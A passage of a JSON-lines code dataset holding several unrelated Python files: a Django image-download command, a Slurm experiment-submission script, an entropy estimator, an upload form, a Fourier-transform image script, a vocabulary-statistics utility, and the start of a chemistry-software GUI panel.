\"unnamed-image\"\n )).strip()\n\n if lqi.listing.product_image:\n lqi.listing.product_image.delete()\n lqi.listing.product_image.save(filename, File(open(file[0])))\n lqi.listing.save()\n lqi.listing.set_product_image()\n lqi.delete()\n\n results[v.pk]['successes'] += 1\n\n except Exception as e:\n import sys\n results[v.pk]['errors'].append({\n 'listing' : lqi.listing,\n 'error' : \"%s\" % smart_text(e)\n })\n\n for v_pk, context in results.items():\n render_and_send_mail(\n \"Results of image downloads for bulk item upload\",\n context,\n \"download_product_images_results\",\n [context['email']]\n )\n","sub_path":"catalog/management/commands/download_product_images.py","file_name":"download_product_images.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477647050","text":"'''simple script for submitting slurm jobs'''\nimport os\nimport pdb\nimport time\nimport random\nimport datetime\nimport subprocess\n\nif 'cs.nyu.edu' in os.uname()[1] or 'dgx' in os.uname()[1]:\n PATH_PREFIX = '/misc/vlgscratch4/BowmanGroup/awang'\n gpu_type = '1080ti'\nelse:\n PATH_PREFIX = '/beegfs/aw3272'\n gpu_type = 'p40' # should be p100 or p40\n\nsmall_tasks = [('squad', 723), ('wnli', 5), ('msrp', 25), ('rte', 18), ('sts-b', 39)]\nbig_tasks = [('mnli', 2612), ('quora', 2421)]\npair_tasks = small_tasks + big_tasks\nsingle_tasks = [('sst', 1053), ('acceptability', 134)]\ntasks = [('qnliv2', 723)] #single_tasks\n\n# MAKE SURE TO CHANGE ME #\nproj_name = 'glue-baselines'\nrand_search = 0\nn_runs = 1\n\n# embedding stuff\nelmo = 1\ndeep_elmo = 0\ncove = 0\nglove = 0\nattn = 1\n\n# model parameters\nd_hids = ['500', '1000', '1500', '2000']\nn_enc_layers = ['1', '2', '3']\nn_hwy_layers = ['0', '1', '2']\ndrops = ['0.0', '0.1', '0.2', '0.3']\nclassifiers = ['log_reg', 'mlp']\n\n# optimization settings\noptimizers = ['sgd', 'adam']\nlrs = ['1e0', '1e-1']#, '1e-2', '1e-3']\ndecays = ['.2', '.5']\n\n# multi task training settings\nbpp_method = 'percent_tr'\nbpps = [1]\nval_intervals = [10000]\nscales = ['none'] #['max', 'min']\nweighting_method = 'proportional'\n\n###### BEST ######\n\n# best model settings\nbest_d_hid = '1500'\nbest_n_enc_layer = '2'\nbest_n_hwy_layer = '0'\nbest_drop = '0.2'\nbest_classifier = 'mlp'\n\n# best optimizer settings\nbest_optimizer = 'adam'\nbest_lr = .0001 # '1e-3'\nbest_lr_decay = '.2'\nbest_task_patience = 0\nbest_patience = '5'\n\n# best multi task settings\nbest_bpp = 1\nbest_val_interval = 10000\nbest_scale = 'max'\nbest_weighting_method = 'proportional'\n\n#for run_n in range(n_runs):\nfor seed in [str(s) for s in [111]]:\n for task, val_interval in tasks:\n exp_name = 'baseline'\n if elmo:\n exp_name = exp_name + '-elmo'\n exp_name = \"%s-%s\" % (task, exp_name)\n\n if rand_search:\n d_hid = random.choice(d_hids)\n n_enc_layer = random.choice(n_enc_layers)\n n_hwy_layer = random.choice(n_hwy_layers)\n drop = random.choice(drops)\n classifier = random.choice(classifiers)\n lr = random.choice(lrs)\n else:\n d_hid = best_d_hid\n n_enc_layer = best_n_enc_layer\n n_hwy_layer = best_n_hwy_layer\n drop = best_drop\n classifier = best_classifier\n\n optimizer = best_optimizer\n lr = str(best_lr)\n lr_decay = best_lr_decay\n task_patience = best_task_patience\n patience = best_patience\n\n bpp = best_bpp\n #val_interval = best_val_interval\n scale = best_scale\n weighting_method = best_weighting_method\n\n if elmo:\n mem_req = 64\n else:\n mem_req = 16\n\n run_name = 'lr%s-s%s' % (lr, str(seed))\n if attn:\n run_name = 'attn-' + run_name\n else:\n run_name = 'noattn-' + run_name\n\n if cove:\n run_name = 'cove-' + run_name\n if elmo:\n run_name = 'elmo-' + run_name\n if not cove and not elmo:\n run_name = 'glove-' + run_name\n run_name = 'singletask-' + run_name\n job_name = '%s_%s' % (run_name, exp_name)\n\n # logging\n exp_dir = '%s/ckpts/%s/%s/%s' % (PATH_PREFIX, proj_name, exp_name, run_name)\n if not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n out_file = exp_dir + '/sbatch.out'\n err_file = exp_dir + '/sbatch.err'\n\n\n slurm_args = ['sbatch', '-J', job_name, '-e', err_file, '-o', out_file,\n '-t', '2-00:00', '--gres=gpu:%s:1' % gpu_type,\n '--mem=%dGB' % mem_req,\n '--mail-type=end', '--mail-user=aw3272@nyu.edu',\n 'run_stuff.sh']\n exp_args = ['-P', PATH_PREFIX, '-n', exp_name, '-r', run_name,\n '-S', seed, '-T', task, '-C', classifier,\n '-o', optimizer, '-l', lr, '-h', d_hid, '-D', drop,\n '-L', n_enc_layer, '-H', n_hwy_layer,\n '-M', bpp_method, '-B', str(bpp), '-V', str(val_interval),\n '-y', lr_decay, '-K', str(task_patience), '-p', patience,\n '-W', weighting_method, '-s', scale,\n '-q', '-m'] # turn off tqdm\n\n exp_args.append('-b')\n if d_hid == '2000' or 'n_enc_layer' == '3':\n exp_args.append('64')\n else:\n exp_args.append('128')\n\n if elmo:\n exp_args.append('-eg')\n if deep_elmo:\n exp_args.append('-d')\n if not glove:\n exp_args.append('-G')\n if cove:\n exp_args.append('-c')\n if attn:\n exp_args.append('-E')\n exp_args.append('attn')\n\n cmd = slurm_args + exp_args\n print(' '.join(cmd))\n subprocess.call(cmd)\n time.sleep(5)\n","sub_path":"are-16-heads-really-better-than-1/GLUE-baselines/src/submit_single.py","file_name":"submit_single.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162195413","text":"\nimport numpy as np\n#import scipy\n#import matcompat\nfrom consts import EPS\n#import matplotlib.pylab as plt\n\n#not fully processed\n\nfrom range_shuffle import range_shuffle\nfrom probqr import probqr\nfrom range_frac import range_frac\nfrom lagrange3 import lagrange3\nfrom lagrange2 import lagrange2\n\ndef hqr(spk, nt, q, biastype):\n\n assert biastype <= 1\n assert type(q) is int\n # Local Variables: h44, h41, biastype, h2, h0, p22, h4, r44, bias, r41, h42, r43, r42, p44, p43, r22, r21, h22, h21, p42, p41, ns, nt, L, n1, h43, hc2, hc3, hc0, hc1, hc4, hc5, q, p, _srange0, spk, p21, n2, n4\n # Function calls: range_shuffle, log2, lagrange2, floor, sum, lagrange3, eps, range_frac, probqr, hqr, size\n #%This function estimates the response entropy of a set of trials\n #%The result is given in bits\n #%The estimator implemented is chosen by biastype:\n #%Bias correction\n #%hc0: direct\n #%hc1= cuadratic extrap\n #%hc2= naive NOT IMPLEMENTED\n #%hc3= Panzeri NOT IMPLEMENTED\n #%hc4= Montemurro NOT IMPLEMENTED\n #%hc5= Nemenman NOT IMPLEMENTED\n hc0 = 0.\n hc1 = 0.\n hc2 = 0.\n hc3 = 0.\n hc4 = 0.\n hc5 = 0.\n #%ntr=size(spk,3);\n #%spkt=squeeze(spk(1,:,:,:)); \n #L = matcompat.size(spk, 2.)\n L = spk.shape[1]\n #%trials=(reshape(spkt,L,[]))'; %comprising all stimulus conditions\n #%ntr=size(spk,3);\n #ns = matcompat.size(spk, 4.)\n ns = spk.shape[3]\n _srange0 = range_shuffle(nt)\n p = probqr(spk, nt, _srange0, q, 1)\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Direct estimation\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n hc0 = -np.sum((p*np.log2((p+EPS))))\n bias = 0.\n _switch_val=biastype\n #if False: # switch\n # pass\n #elif _switch_val == 1.:\n # bias = 1.\n #elif _switch_val == 8.:\n # bias = 8.\n #\n #\n _switch_val=bias\n #if False: # switch\n # pass\n if _switch_val == 0.:\n bias = 0.\n h0 = hc0\n elif _switch_val == 1.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%This is the 3 point extrapolation taking 1/4, 1/2 and 1/1 of the trials\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n _srange0 = range_shuffle(nt)\n r21 = range_frac(_srange0, nt, 2., 1.)\n r22 = range_frac(_srange0, nt, 2., 2.)\n r41 = range_frac(_srange0, nt, 4., 1.)\n r42 = range_frac(_srange0, nt, 4., 2.)\n r43 = range_frac(_srange0, nt, 4., 3.)\n r44 = range_frac(_srange0, nt, 4., 4.)\n p21 = probqr(spk, nt, r21, q, 2.)\n p22 = probqr(spk, nt, r22, q, 2.)\n p41 = probqr(spk, nt, r41, q, 4.)\n p42 = probqr(spk, nt, r42, q, 4.)\n p43 = probqr(spk, nt, r43, q, 4.)\n p44 = probqr(spk, nt, r44, q, 4.)\n h21 = -np.sum((p21*np.log2((p21+EPS))))\n h22 = -np.sum((p22*np.log2((p22+EPS))))\n h41 = -np.sum((p41*np.log2((p41+EPS))))\n h42 = -np.sum((p42*np.log2((p42+EPS))))\n h43 = -np.sum((p43*np.log2((p43+EPS))))\n h44 = -np.sum((p44*np.log2((p44+EPS))))\n h4 = (h41+h42+h43+h44)/4.\n h2 = (h21+h22)/2.\n n1 = np.sum(nt)\n n2 = np.sum(np.floor((nt/2.)))\n n4 = np.sum(np.floor((nt/4.)))\n #%h0=(8*hc0-6*h2+h4)/3; %parabolic extrapolation\n #h0 = lagrange3(np.array(np.hstack((1./n4, 1./n2, 1./n1))), np.array(np.hstack((h4, h2, hc0))), 0.)\n h0 = lagrange3(np.array([1./n4, 1./n2, 1./n1]), np.array([h4, h2, hc0]), 0.)\n #%h0=(-h2*ntr2^2*(ntr-ntr4)+h4*ntr4^2*(ntr-ntr4)+hd*ntr^2*(ntr2-ntr4))/((ntr-ntr2)*(ntr-ntr4)*(ntr2-ntr4));\n #%hst=(4*hd-h21-h22)/2; %linear extrapolation\n elif _switch_val == 2.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Naive correction\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n h0 = 0.\n elif _switch_val == 3.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Panzeri\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n h0 = 0.\n elif _switch_val == 4.:\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%Montemurro\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n h0 = 0.\n elif _switch_val == 5.:\n h0 = 0.\n #%first recover absolute freqs\n #%THIS IS A CHEAT\n #%n=round(ntr*ns*p);\n #%[h0]=saddleentr2(n);;\n elif _switch_val == 8.:\n _srange0 = range_shuffle(nt)\n r21 = range_frac(_srange0, nt, 2., 1.)\n r22 = range_frac(_srange0, nt, 2., 2.)\n p21 = probqr(spk, nt, r21, q, 2.)\n p22 = probqr(spk, nt, r22, q, 2.)\n h21 = -np.sum((p21*np.log2((p21+EPS))))\n h22 = -np.sum((p22*np.log2((p22+EPS))))\n h2 = (h21+h22)/2.\n #%h0=(8*hc0-6*h2+h4)/3; %parabolic extrapolation\n n1 = np.sum(nt)\n n2 = np.sum(np.floor((nt/2.)))\n #h0 = lagrange2(np.array(np.hstack((1./n2, 1./n1))), np.array(np.hstack((h2, hc0))), 0.)\n h0 = lagrange2(np.array([1./n2, 1./n1]), np.array([h2, hc0] ), 0.)\n\n #%error estimation, Latham's\n #%N=ntr;\n #%err=sqrt((sum(p.*log2(p+eps).^2)-(hd*L)^2)/(L*N));\n return h0\n ","sub_path":"incubator/hqr.py","file_name":"hqr.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224108249","text":"from django import forms\n\nfrom grandchallenge.jqfileupload.widgets import uploader\nfrom grandchallenge.jqfileupload.widgets.uploader import UploadedAjaxFileList\n\ntest_upload_widget = uploader.AjaxUploadWidget(\n ajax_target_path=\"ajax/ulwidget1/\"\n)\ntest_upload_widget2 = uploader.AjaxUploadWidget(\n ajax_target_path=\"ajax/ulwidget2/\", multifile=False\n)\n\n\nclass UploadForm(forms.Form):\n title = forms.CharField(label=\"Blah\")\n something = forms.CharField(label=\"Blabl\")\n upload_form = UploadedAjaxFileList(widget=test_upload_widget)\n upload_form2 = UploadedAjaxFileList(widget=test_upload_widget2)\n","sub_path":"app/grandchallenge/jqfileupload/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"254511447","text":"import cv2\nfrom pylab import *\nimport time\nimport subprocess\n\n\ndef transformada(img, s=None, axes=(-2, -1), norm=None):\n return calcula(img, s, axes, ifft, norm)\n\ndef calcula(a, s=None, axes=None, function=fft, norm=None):\n a = asarray(a)\n s, axes = _cook_nd_args(a, s, axes)\n itl = list(range(len(axes)))\n itl.reverse()\n for ii in itl:\n a = function(a, n=s[ii], axis=axes[ii], norm=norm)\n return a\n\ndef _cook_nd_args(a, s=None, axes=None, invreal=0):\n if s is None:\n shapeless = 1\n if axes is None:\n s = list(a.shape)\n else:\n s = take(a.shape, axes)\n else:\n shapeless = 0\n s = list(s)\n if axes is None:\n axes = list(range(-len(s), 0))\n if len(s) != len(axes):\n raise ValueError(\"Shape and axes have different lengths.\")\n if invreal and shapeless:\n s[-1] = (a.shape[axes[-1]] - 1) * 2\n return s, axes\n\ndef _wrapfunc(obj, method, *args, **kwds):\n try:\n return getattr(obj, method)(*args, **kwds)\n except (AttributeError, TypeError):\n return _wrapit(obj, method, *args, **kwds)\n\n\ndef take(a, indices, axis=None, out=None, mode='raise'):\n return _wrapfunc(a, 'take', indices, axis=axis, out=out, mode=mode)\n\ndef _wrapit(obj, method, *args, **kwds):\n try:\n wrap = obj.__array_wrap__\n except AttributeError:\n wrap = None\n result = getattr(asarray(obj), method)(*args, **kwds)\n if wrap:\n if not isinstance(result):\n result = asarray(result)\n result = wrap(result)\n return result\n\n\n#lendo imagem em tons de cinza\nimg = cv2.imread('imgs/dog-1210559_960_720.jpg',0)\nimg2 = cv2.imread('imgs/índice.jpeg',0)\nimg3 = cv2.imread('imgs/paisagem.jpeg',0)\n\n\n#Fourier\nini = time.time()\nf1 = transformada(img)\nf2 = np.fft.fftshift(f1)\ntimef = time.time()\n\nprint (\"Tempo calculo Fourier imagem menor: \", timef-ini, 'segundos')\n\n#calculando spectro da imagem\nspectre = 20*np.log(np.abs(f2))\n\nf_inverse = np.fft.ifftshift(f2)\nreturns = np.fft.ifft2(f_inverse) #retornando imagem para o dom�nio espacial\nreturns = np.abs(returns)\n\n#Fourier2\nini2 = time.time()\nf3 = transformada(img2)\nf4 = np.fft.fftshift(f3)\ntimef = time.time()\n\nprint (\"Tempo calculo Fourier imagem 920: \", timef-ini, 'segundos')\n\n#calculando spectro da imagem\nspectre2 = 20*np.log(np.abs(f4))\n\nf_inverse2 = np.fft.ifftshift(f4)\nreturns2 = np.fft.ifft2(f_inverse2) #retornando imagem para o dom�nio espacial\nreturns2 = np.abs(returns2)\n\n#Fourier3\nini3 = time.time()\nf5 = transformada(img3)\nf6 = np.fft.fftshift(f5)\ntimef = time.time()\n\nprint (\"Tempo calculo Fourier imagem 1920: \", timef-ini, 'segundos')\n\n#calculando spectro da imagem\nspectre3 = 20*np.log(np.abs(f6))\n\nf_inverse3 = np.fft.ifftshift(f6)\nreturns3 = np.fft.ifft2(f_inverse3) #retornando imagem para o dom�nio espacial\nreturns3 = np.abs(returns3)\n\nplt.subplot(131),plt.imshow(img, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Imagem original')\nplt.subplot(132),plt.imshow(spectre, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Spectro')\nplt.subplot(133),plt.imshow(returns, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('imagem retornada')\nplt.show()\nplt.savefig(\"imgs/dog960.png\", dpi = 120)\n\nplt.subplot(131),plt.imshow(img2, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Imagem original')\nplt.subplot(132),plt.imshow(spectre2, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Spectro')\nplt.subplot(133),plt.imshow(returns2, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('imagem retornada')\nplt.axis(\"off\")\nplt.show()\nplt.savefig(\"imgs/dog160.png\", dpi = 120)\nreturn_code = subprocess.call('gimp imgs/dog960.png', shell=True)\n\nplt.subplot(131),plt.imshow(img3, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Imagem original')\nplt.subplot(132),plt.imshow(spectre3, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('Spectro')\nplt.subplot(133),plt.imshow(returns3, cmap = 'gray')\nplt.axis(\"off\")\nplt.title('imagem retornada')\nplt.show()\nplt.savefig(\"imgs/dog1920.png\", dpi = 120)\n\n\n\n\n\n\n","sub_path":"spectro.py","file_name":"spectro.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39990098","text":"import re\r\nimport pandas as pd\r\nfrom six import iteritems\r\nfrom collections import Counter\r\n\r\ndef flatten(sequences):\r\n return [entry for seq in sequences for entry in seq]\r\n\r\n\r\ndef get_vocab_dist(tokens): \r\n \r\n return Counter([tok for sent in tokens for tok in sent])\r\n\r\ndef get_vocab(tokens):\r\n \r\n vocab_dist = get_vocab_dist(tokens)\r\n \r\n return set([tok for tok, cnt in vocab_dist.items()])\r\n\r\n\r\ndef fix_vocab(tokens, min_count, unk):\r\n\r\n\r\n # Distribution of open vocabulary\r\n vocab_open_dist = get_vocab_dist(tokens)\r\n \r\n # Open vocabulary\r\n vocab_open = set([tok for tok, cnt in vocab_open_dist.items()])\r\n \r\n # Fix vocabulary\r\n vocab_fixed = set([tok for tok, cnt in vocab_open_dist.items() \\\r\n if cnt >= min_count])\r\n\r\n # Replace OOV with UNK\r\n for i, sent in enumerate(tokens):\r\n for j, tok in enumerate(sent):\r\n if tokens[i][j] not in vocab_fixed:\r\n tokens[i][j] = unk\r\n\r\n # Fix vocabulary\r\n vocab_fixed_dist = get_vocab_dist(tokens)\r\n\r\n\r\n return (tokens, vocab_open_dist, vocab_fixed_dist)\r\n\r\n\r\n\r\n\r\nclass Vocab(object):\r\n \r\n def __init__(self, \\\r\n to_lower=True):\r\n \r\n self.to_lower = to_lower \r\n self.vocab_dict = {}\r\n self.word_count = 0\r\n self.file_count = 0\r\n self.sent_count = 0\r\n \r\n \r\n def add_tokens(self, tokens):\r\n '''\r\n Add tokens to vocabulary dict\r\n tokens: list of tokens OR list of list of tokens\r\n '''\r\n \r\n if len(tokens) > 0:\r\n \r\n # Increment sentence count\r\n self.sent_count += len(tokens)\r\n \r\n # Flatten, if list of list of tokens\r\n if isinstance(tokens[0], list):\r\n tokens = flatten(tokens)\r\n \r\n # Convert to lower case\r\n if self.to_lower:\r\n tokens = [t.lower() for t in tokens]\r\n \r\n # Add to vocab\r\n unique_tokens = set(tokens)\r\n current_vocab = set(self.vocab_dict.keys())\r\n missing_vocab = unique_tokens - current_vocab\r\n for tok in missing_vocab:\r\n self.vocab_dict[tok] = 0\r\n \r\n # Count token occurrences\r\n for tok in tokens:\r\n self.vocab_dict[tok] += 1\r\n\r\n # Increment word count\r\n self.word_count += len(tokens)\r\n \r\n \r\n def add_string(self, doc):\r\n self.add_tokens([line.split() for line in doc.splitlines()])\r\n \r\n def add_doc(self, fn=None, tokens=None, str_=None):\r\n '''\r\n Include additional document\r\n '''\r\n # Make sure only one input is not None\r\n ck = len([True for i in [fn, tokens, str_] if i != None]) == 1\r\n msg = 'Must provide exactly one of the following: fn, tokens, str_'\r\n assert ck, msg\r\n \r\n # Read from disk \r\n if fn != None:\r\n with open(fn,'r') as f:\r\n for line in f:\r\n self.add_string(line.strip())\r\n\r\n # Load as tokens\r\n elif tokens != None:\r\n self.add_tokens(tokens)\r\n \r\n # Load as string\r\n elif str_ != None:\r\n self.add_string(str_)\r\n \r\n # Increment file count\r\n self.file_count += 1 \r\n\r\n def add_dir(self, pat='*.*'):\r\n \r\n \r\n # Find all files in directory matching pattern\r\n files = glob.glob(\"{}/{}\".format(directory, pat))\r\n \r\n for fn in files:\r\n self.add_doc(fn)\r\n \r\n\r\n \r\n def vocab_dataframe(self, token_pattern=None):\r\n \r\n # Filter to vocabulary based on pattern\r\n if token_pattern:\r\n regex = re.compile(token_pattern, flags=re.IGNORECASE)\r\n vocab_dict = {k: v for k, v in iteritems(self.vocab_dict) \\\r\n if regex.search(k)}\r\n else:\r\n vocab_dict = self.vocab_dict.copy()\r\n \r\n # Convert vocab dictionary to list of tuple\r\n vocab_list = [(k, v) for k, v in iteritems(vocab_dict)]\r\n \r\n # Create and sort data frame (vocabulary histogram)\r\n df = pd.DataFrame(vocab_list, columns=['token', 'count'])\r\n df.sort_values('count', inplace=True, ascending=False)\r\n \r\n return df\r\n\r\n def summary(self):\r\n text = []\r\n text.append(\"Document count:\\t{}\".format(self.file_count))\r\n text.append(\"Word count:\\t{}\".format(self.word_count))\r\n text.append(\"Vocab size:\\t{}\".format(len(self.vocab_dict.keys())))\r\n text.append(\"Vocab:\\n{}\".format(self.vocab_dataframe()))\r\n return \"\\n\".join(text)\r\n \r\n def __str__(self):\r\n return str(self.vocab_dataframe())\r\n \r\n \r\n def compare_vocab(self, ref_vocab):\r\n '''\r\n Compare vocab with reference vocab\r\n '''\r\n \r\n # Make sure reference vocabulary is a set\r\n ref_vocab = set(ref_vocab)\r\n if self.to_lower:\r\n ref_vocab = set([w.lower() for w in ref_vocab])\r\n \r\n # Get vocab of self\r\n self_vocab = set(self.vocab_dict.keys())\r\n \r\n # Intersection of vocabularies\r\n vocab_intersection = self_vocab.intersection(ref_vocab)\r\n \r\n # Vocabulary coverage\r\n vocab_coverage = len(vocab_intersection)/float(len(self_vocab))\r\n \r\n # Dictionary of OOV tokens with count\r\n OOV_dict = {word:cnt for word, cnt in self.vocab_dict.items() \\\r\n if word not in ref_vocab}\r\n OOV_list = [(word, cnt) for word, cnt in OOV_dict.items()]\r\n OOV_df = pd.DataFrame(OOV_list, columns=['token', 'count'])\r\n OOV_df.sort_values('count', inplace=True, ascending=False)\r\n \r\n # Number of out of vocabulary words\r\n OOV_count = sum([cnt for word, cnt in OOV_dict.items()])\r\n OOV_rate = OOV_count/float(self.word_count)\r\n \r\n # Double check word count\r\n word_count = sum([cnt for word, cnt in self.vocab_dict.items()])\r\n assert word_count == self.word_count, 'Word count mismatch'\r\n \r\n \r\n # Summary of results\r\n summary_dict = {'self_vocab_size': len(self_vocab), \r\n 'self_word_count': self.word_count, \r\n 'ref_vocab_size': len(ref_vocab), \r\n 'vocab_coverage': vocab_coverage, \r\n 'OOV_count': OOV_count, \r\n 'OOV_rate': OOV_rate}\r\n \r\n \r\n return (summary_dict, OOV_df)\r\n \r\n def compare_vocab_mult(self, ref_vocab_dict):\r\n '''\r\n Compare multiple vocabularies with reference\r\n '''\r\n \r\n summary = []\r\n OOV = []\r\n for name, ref_vocab in ref_vocab_dict.items():\r\n summary_dict, OOV_df = self.compare_vocab(ref_vocab)\r\n \r\n # Add name\r\n summary_dict['ref_vocab'] = name\r\n\r\n # Make 'token' index and rename column\r\n OOV_df.set_index('token', inplace=True)\r\n OOV_df.columns = [name]\r\n \r\n # Append\r\n summary.append(summary_dict)\r\n OOV.append(OOV_df)\r\n \r\n # Build summary data frame and reorder columns\r\n columns = ['self_word_count', 'self_vocab_size', \r\n 'ref_vocab', 'ref_vocab_size', \r\n 'vocab_coverage', 'OOV_count', 'OOV_rate']\r\n summary = pd.DataFrame(summary)\r\n summary = summary[columns]\r\n\r\n \r\n OOV_ = OOV[0]\r\n for oov in OOV[1:]:\r\n OOV_ = OOV_.join(oov, how='outer')\r\n \r\n\r\n \r\n return (summary, OOV_)\r\n \r\n \r\n \r\ndef eval_vocab(tokens, vocab):\r\n \r\n '''\r\n Compare vocab with reference vocab\r\n '''\r\n \r\n # Make sure reference vocabulary is a set\r\n vocab = set(vocab)\r\n \r\n # Flatten tokens\r\n tokens = [tok for sent in tokens for tok in sent]\r\n \r\n # Test vocab\r\n tokens_vocab = set(tokens)\r\n \r\n # Word count\r\n word_count = len(tokens)\r\n \r\n # Intersection of vocabularies\r\n vocab_intersection = tokens_vocab.intersection(vocab)\r\n \r\n # Vocabulary coverage\r\n vocab_coverage = len(vocab_intersection)/float(len(tokens_vocab))\r\n \r\n # Number of out of vocabulary words\r\n OOV_count = sum([1 for tok in tokens if tok not in vocab])\r\n OOV_rate = OOV_count/float(word_count)\r\n \r\n # Summary of results\r\n summary = [ \\\r\n ('token_vocab_size', len(tokens_vocab)), \r\n ('word_count', word_count), \r\n ('vocab_size', len(vocab)), \r\n ('vocab_coverage', vocab_coverage), \r\n ('OOV_count', OOV_count), \r\n ('OOV_rate', OOV_rate)]\r\n \r\n df = pd.DataFrame(summary, columns=['Parameter', 'Value'])\r\n \r\n return df","sub_path":"code/utils/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"569623260","text":"from templates import *\n\nclass Ged03RunTypeFrame(EcceFrame):\n def __init__(self, parent, title, app, helpURL=\"\"):\n EcceFrame.__init__(self, parent, title)\n panel = Ged03RunTypePanel(self, helpURL)\n self.Finalize()\n\nclass Ged03RunTypePanel(EccePanel):\n def __init__(self, parent, helpURL):\n EccePanel.__init__(self, parent, helpURL)\n\n if (EcceGlobals.RunType == \"Gradient\"):\n gradSizer = EcceBoxSizer(self,\n label = \"Gradient\",\n cols = 2)\n \n if (EcceGlobals.Category == \"SCF\" or\n EcceGlobals.Category == \"DFT\" or\n (EcceGlobals.Category == \"MP\" and\n (EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\" or\n EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\")) or\n EcceGlobals.Category == \"CI\" or\n (EcceGlobals.Category == \"CC\" and\n (EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\" or\n EcceGlobals.Theory == \"RCCD\" or\n EcceGlobals.Theory == \"UCCD\"))):\n gradMethodChoice = [\"Analytic\",\n \"Finite Difference\"]\n elif (EcceGlobals.Category == \"SE\"):\n gradMethodChoice = [\"Analytic\"]\n else:\n gradMethodChoice = [\"Finite Difference\"]\n self.gradMethod = EcceComboBox(self,\n choices = gradMethodChoice,\n name = \"ES.Runtype.Gradient.Method\",\n default = 0,\n label = \"Method:\")\n gradSizer.AddWidget(self.gradMethod)\n\n self.panelSizer.Add(gradSizer)\n \n if (EcceGlobals.RunType == \"Geometry\" or\n EcceGlobals.RunType == \"GeoVib\"):\n # GEOMETRY OPTIMIZATION\n geometrySizer = EcceBoxSizer(self,\n label = \"Geometry Optimization\",\n cols = 2)\n \n findChoice = [\"Minimum\",\n \"Transition State\"]\n findDefault = 0\n if (EcceGlobals.ReactionStudyFlag!=0 and\n EcceGlobals.CalculationName==\"Transition-State\"):\n findDefault = 1\n self.find = EcceComboBox(self,\n choices = findChoice,\n name = \"ES.Runtype.GeomOpt.SearchFor\",\n default = findDefault,\n label = \"Find:\")\n if findDefault != 0:\n self.find.export = 1\n geometrySizer.AddWidget(self.find)\n \n # CONVERGENCE\n convergenceSizer = EcceBoxSizer(self,\n label = \"Convergence\",\n cols = 3)\n \n gradientChoice = [\"Loose\",\n \"Medium\",\n \"Tight\",\n \"Very Tight\"]\n self.gradient = EcceComboBox(self,\n choices = gradientChoice,\n name = \"ES.Runtype.GeomOpt.ConvergenceGradient\",\n default = 1,\n label = \"Gradient:\")\n convergenceSizer.AddWidget(self.gradient)\n \n self.stepCheckBox = EcceCheckBox(self,\n label = \" Max Steps:\",\n name = \"ES.Runtype.GeomOpt.MaximumSteps\",\n default = 0)\n convergenceSizer.AddWidget(self.stepCheckBox)\n \n self.stepSpin = EcceSpinCtrl(self,\n hardRange = \"[1..)\",\n softRange = \"[1..100]\",\n name = \"ES.Runtype.GeomOpt.MaximumStepsValue\",\n default = 20,\n export = 1)\n convergenceSizer.AddWidget(self.stepSpin)\n \n # HESSIAN\n hessianSizer = EcceBoxSizer(self,\n label = \"Hessian\",\n cols = 2)\n \n if (EcceGlobals.Category == \"SCF\" or\n EcceGlobals.Category == \"DFT\" or\n (EcceGlobals.Category == \"MP\" and\n (EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\" or\n EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\")) or\n (EcceGlobals.Category == \"CC\" and\n (EcceGlobals.Theory == 